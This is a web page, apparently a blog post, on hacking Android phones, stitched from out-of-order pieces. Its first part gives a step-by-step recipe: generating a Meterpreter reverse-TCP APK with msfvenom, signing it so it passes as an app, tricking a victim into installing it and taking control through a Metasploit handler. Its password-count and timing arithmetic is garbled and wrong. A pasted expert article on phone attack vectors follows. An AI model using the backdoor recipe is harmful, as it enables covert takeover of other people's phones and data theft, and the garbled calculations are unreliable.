top of page

The number of passwords:

The total number of possible combinations for a 4 digit numeric lock can start from 4 zeros to 4 nines which means 0000-9999, so we have about :

total delay
1048576/5 = 209715.2 times
total time 209715.2 * 30 = 6291456 sec
or
1747.6266 hours

Possibility # 2: 41 passwords wrong, delay 30 sec.

total delays
1048576 / 41 = 25,575.0243 delays
total time consumed
25575.0243 * 30 = 7,67,250.729 sec
or
767250.729 / 60 = 12,787.5121 min
or
12,787.51215 hours

You can see it is almost impossible to find the person's phone's password by brute-forcing. You will be dead by the time you find the phone's password 😣.

Payloads

Payloads are simple scripts that help a hacker hack a system. So now, if I just trick the person into authorizing and installing the .apk file, which opens a back door for Meterpreter to listen on for a connection to get the system under its control.

 

meterpreter reverse tcp payload creation command:

msfvenom –p android/meterpreter/reverse_tcp LHOST=Localhost IP LPORT=LocalPort R > android_shell.apk

Payload is -p, LHOST Localhost IP to receive a back connection (Check yours with if-config command), LPORT Localhost port on which the connection listen for the victim (we set it to 4444), R Raw format (we select .apk).

We need to provide a certificate to the .apk file to give it an identity. We need to sign a cert for a .apk file to give it recognition as an application. Without this, the .apk file will be recognized as a virus.

To assign a cert, you must follow these steps

Install:

  • Keytool

  • Jar signer

  • Zipalign

Sign the .apk file locally:

keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore android_shell.apk hacked

Signing a .apk file with JARsigner:

jarsigner -verify -verbose -certs android_shell.apk

Install and use Zipalign:

sudo apt-get install zipalign
or
sudo apt install zipalign

zipalign -v 4 android_shell.apk singed_jar.apk

Now run the command for that is in the Metasploit console:

use exploit/multi/handler

And set the various parameters in Metasploit like the lhost, lport, etc. Now you need to run the command after setting the host and port type:

type:
run (and press enter)

After you execute this code, you will receive a connection to the target system. Using this, you can access the whole system and gain full access.

Factory Reset

A flashed phone is a device where a different ROM/operating system has been flashed on top of the system that came with the phone. Often, phones can be flashed to appear unlocked, whereas, in reality, they are still carrier-branded phones that will not be compatible with our service.

For every phone, there are different methods for factory reset, the most common is to do it via the volume buttons and the power button. For example, I have an old oppo phone for which the factory reset combination is down volume button and power button and for 5 seconds and the phone is flashed.

Bypass

Bypass is a commonly used method by law enforcement like the CIA, FBI & in India, the IB & RAW use a special device as shown in the picture.

In such kind of attack's it mainly depends on the attacker using the IP_BOX, which works mainly on the bruteforcing of the target. This is mainly used by law enforcement to get into the phones of terrorist's cybercriminals and other criminals' phones.

You can use another tool known as the BashBunny from hak5. This is a mini-computer from which u can conduct a login Bruteforce attack. Unlike the other options above, this is a serious beast in its work. In a matter of hours, you can crack the most difficult of difficult passwords with ease.

Mobile security often beats PCs, but users can still be fooled and smartphones can still be hacked. Here’s what you need to watch for.

4^10 amount of password
or
1048576 passwords in total

Keytool making Keystore:

The methods used by attackers to exploit android phones are increasing. People are busy finding new vulnerabilities to exploit. Below are a few ways to hack Android phones:

  • HID (Human Interface Device) Attack

  • Password BruteForce

  • Payloads (Custom hacking scripts)

  • Factory Reset

  • Bypass

HID

The HID attack is a scenario in which an attacker takes a programmable embedded development platform, such as an associated software package like SET (Social Engineering Toolkit), Metasploit, etc., or uses other phones and USB's which are programmed to be a RubberDucky and execute an attack.

In such an attack, the hacker installs a backdoor, and by using that, he completely downloads the target's information.

Using the information, he can either hack into the bank account of the person or even sell them on the dark web.

You can see how a hid attack is conducted from the

android infosec

channel

Login Bruteforce

A brute-force attack uses the trial and error method to guess the correct password of the phone.

Some important points to consider to conduct such an attack:

  • Number of passwords

  • The timeout

  • The time it might take

The timeout:

After 5 Wrong pin's - 30 sec delay
After 1 Wrong pin's - 30 sec delay
After 41 Wrong pin's - 30 sec delay

Time consumed:

Let's see some possibilities for our understanding:

Possibility # 1: 5 passwords wrong, a delay of 30 seconds. We need to find out how many times we get the delay in the first place and find the total time consumed.

The smartphone revolution was supposed to provide a second chance for the tech industry to roll out a secure computing platform. These new devices were purported to be locked down and immune to malware, unlike buggy PCs and vulnerable servers.

But it turns out that phones are still computers and their users are still people, and computers and people will always be weak links. We spoke to a number of security experts to help you get a sense of the most common ways attackers might go about breaking into the powerful computers in your users’ pockets. This should hopefully give you perspective on potential vulnerabilities.

7 ways to hack a phone

  1. Social engineering

  2. Malvertising

  3. Smishing

  4. Malware

  5. Pretexting

  6. Breaking in via Bluetooth

  7. Man-in-the-middle Wi-Fi attacks

1. Social engineering
The easiest way for any hacker to break into any device is for the user to open the door themselves. Making that happen is easier said than done, of course, but it’s the goal of most forms of social engineering attacks.

Smartphone operating systems generally have stricter security regimes than PCs or servers, with application code running in a sandboxed mode that prevents it from escalating privileges and taking over the device. But that much vaunted security model, in which mobile users need to take affirmative action in order for code to access protected areas of the phone’s operating system or storage, has a drawback: it results in an abundance of pop-up messages that many of us learn to tune out. “Applications on mobile devices segregate permissions in order to protect the user from rogue apps having a free for all with your data,” says Catalino Vega III, Security Analyst at Kuma LLC. “The prompt becomes familiar: ‘Do you want to allow this application access to your photos?'”

“This really adds just a single step between the provisioning of that access to the application,” he continues. “And because of the way the user experience has conditioned the acceptance of most prompts as a gate to accessing functionality, most users will just allow the app access to whatever it is requesting. I think this may be something we are all guilty of at some point.”

2. Malvertising

One particularly important vector for these kinds of deceptive dialog boxes are so-called “malvertisements,” which piggyback onto the infrastructure developed for the mobile advertising ecosystem, whether in a browser or within an app.

“The goal is to get you to click on the advertisement,” says Chuck Everette, Director of Cybersecurity Advocacy at Deep Instinct. “They are trying to lure you in with something that will get you to click before you think—a knee-jerk reaction, or something that looks like an alert or warning.” The aim, he says, is to “try and scare you or tempt you into clicking on the link.”

One example he cites was a game called Durak, which would coax users into unlocking their Android phones by tricking them into turning off security features and installing other malicious applications. Far from being some dodgy off-label sideloaded app, Durak was available in the official Google Play marketplace. “67% of all malicious apps can be traced back to being downloaded from the Google Play store, while only 10% came from alternative third-party party markets,” he explains. “Consumers on Google Play greatly rely on reviews from other users if the app is safe or not. This does not work.” In contrast, he says, “Apple closely inspects every app on its app store, which decreases the number of apps available—but greatly reduces apps that are reported to be malicious.”

3. Smishing

Another vector attackers use to get that all-important tappable link in front of their victims is SMS text messaging, with a whole different set of social engineering tricks in play; the practice is known as SMS phishing or smishing, and it snags the gullible and the high-powered alike.  

“There are multiple ways that cybercriminals can utilize SMS phishing, depending on their intention and goal,” says Rasmus Holst, CRO of Wire. “If the objective is to install malware onto a device, then a file is usually attached accompanied by a message that tries to persuade the user to click and download it. For example, cybercriminals can impersonate someone trusted, such as an employer or manager asking an employee to review the attached document, laying a trap for a busy and unsuspecting victim. Two years ago, Jeff Bezos’ phone was hacked after he downloaded a single video file from a trusted contact. In some cases, hackers using zero-day exploits of mobile browsers can push a malicious file onto a phone without user consent as long as they click the link.”

4. Malware

If a hacker can’t trick you into clicking a button and unwittingly lowering your phone’s security barriers, they might seek out someone who’s already done so deliberately by jailbreaking their phone. Jailbreaking is seen by many as allowing users to better customize their device and install the apps of their choice from unofficial sources, but by its nature it relaxes the strict security sandboxing that keeps smartphones locked down.

“Hackers create applications that users would have a genuine interest in, such as a free VPN, with the intention of downloading malware onto unsuspecting users’ devices,” says David Schoenberger, founder and Chief Innovation Officer of Eclypses. “Once these malicious applications are downloaded onto a device, they detect whether that device has been rooted or jailbroken — and if so, they steal personally identifiable information and other sensitive data. Once a device has been jailbroken, the operating system becomes compromised, allowing easy access to passwords, chats, or other input data, such as bank or payment information.”

5. Pretexting

Finally, if the user won’t give up control of their device willingly, an attacker can go over their head to their mobile provider. You might remember the mid ’00s British media scandal in which tabloids used what they called “blagging” techniques to access the mobile voicemail boxes of celebrities and crime victims. This process, also known as pretexting, involves an attacker piecing together enough personal information about their victim to plausibly impersonate them in communications with their phone provider and thus getting access to the victim’s account.

The tabloids were just after scoops, but criminals can use the same techniques to do even more damage. “If successfully verified, the attacker convinces the phone carrier to transfer the victim’s phone number to a device they possess, in what’s known as a SIM swap,” says Adam Kohnke, Information Security Manager at the Infosec Institute. “Calls, texts, and access codes—like the second-factor authentication codes your bank or financial providers send to your phone via SMS—now go to the attacker and not you.”

6. Breaking in via Bluetooth

There are a pair of wireless attack vectors that hackers can use to breach phones without tricking anyone into giving up permissions. Both require physical proximity to the target but can sometimes be pulled off in public spaces. “The Bluetooth connection is one of the weak spots for a smartphone, and hackers often use special methods to connect to devices that operate on Bluetooth and hack them,” says Aleksandr Maklakov, a tech and security expert and CIO at MacKeeper. “This is a common hacking method because many people keep their Bluetooth connection on. If a Bluetooth connection is unregulated, hackers can get close to your smartphone and hack their way in without notice.”

7. Man-in-the-middle Wi-Fi attacks

Another potential wireless attack vector is a man-in-the-middle Wi-Fi attack. ” Many people tend to connect their smartphones with the freely available public Wi-Fi whenever they get an opportunity,” explains Peter Baltazar, a cybersecurity expert and technical writer at MalwareFox.com. “This habit can lead to major trouble as clever hackers can intercept the connection and infiltrate the phone.” By intercepting communications, hackers can get a wealth of information without ever taking control of the user’s phone. (Communication that uses TLS 1.3 is much more difficult to intercept in this way, but that protocol still hasn’t been universally rolled out.)

They’ve broken in, now what?

Once an attacker has used one of the techniques outlined above to gain a foothold on a smartphone, what’s their next step? While smartphone OSes are ultimately derived from Unix-like systems, an attacker who’s managed to force a breach will find themselves in a very different environment from a PC or server, says Callum Duncan, director at Sencode Cybersecurity.

“Most apps interface with the operating system and other applications on what are essentially API calls,” he explains. “The kernels for iOS and Android are so vastly different from anything that would resemble their Unix base that shared exploits would be almost impossible. Command lines do exist for both devices but are only accessible the highest level of privilege for both devices and can usually only be accessed but rooting or jailbreaking the device.”

But just because it’s hard doesn’t mean it’s impossible. “Exploits of that type do exist,” Duncan says. “Privilege escalation would be key to this process and working around inbuilt safety mechanisms would be hard, but any attacker with the ability to run code on a user’s device is doing just that — running code on a user’s device — so if they’re smart enough they could make that device do whatever they please.”

Caitlin Johanson, Director of the Application Security Center of Excellence at Coalfire, says that a surprising amount of sensitive data is accessible to attackers who gain a foothold on a device. “Data stores such as SQLite get created by installed apps and could contain everything from web request and response content to potentially sensitive information and cookies,” she explains. “Common weaknesses observed in both iOS and Android include caching of application data within memory (such as authentication credentials), as well as persistence of thumbnails or snapshots of the running application, which could inadvertently store sensitive information to the device. Sensitive information—most often left unencrypted—is found in abundance within browser cookie values, crash files, preference files, and web cache content created in easy-to-read formats stored right on the device.”

“The very tools created for development purposes are what makes it easier for an attacker to extract, interact with, or even modify this kind of data, such as abd on Android or iExplorer or plutil on iOS,” she continues. “Standard utilities can be used for the examination of any database files copied from the device, and if we run into the need to decrypt, there’s tools like Frida to run scripts to decrypt stored values.”

Thick as thieves

We don’t mean to oversell how simple any of this is. Most users don’t jailbreak their phones, click smishing links, or give enhanced privileges to dodgy applications. Even when hackers do gain a foothold on a device, they’re often stymied by iOS and Android’s built-in security measures.

Perhaps more than any specific technique outlined here, the way to hack a smartphone is via sheer determination. “Attackers create highly repeatable and automated models that pick and pry at every angle of a mobile app or a new operating system version in hope of finding a weak point,” explains Hank Schless, Senior Manager at Security Solutions at Lookout. “Once they find an exploitable weakness, they try to use it to their advantage as quickly as possible before a fix is released.”

And if you can’t figure out how to breach a cell phone, well, maybe you can find a friend who can help. “Information sharing among cybercriminals most commonly occurs either on the dark web or in groups on encrypted chat platforms like Telegram,” Schless says. “Larger groups, such as those backed by nation-states, are encouraged to share code and exploits amongst each other with the hope that collective efforts will help create more successful malicious campaigns.” The good guys need to share intelligence too, because they clearly have their work cut out for them.

bottom of page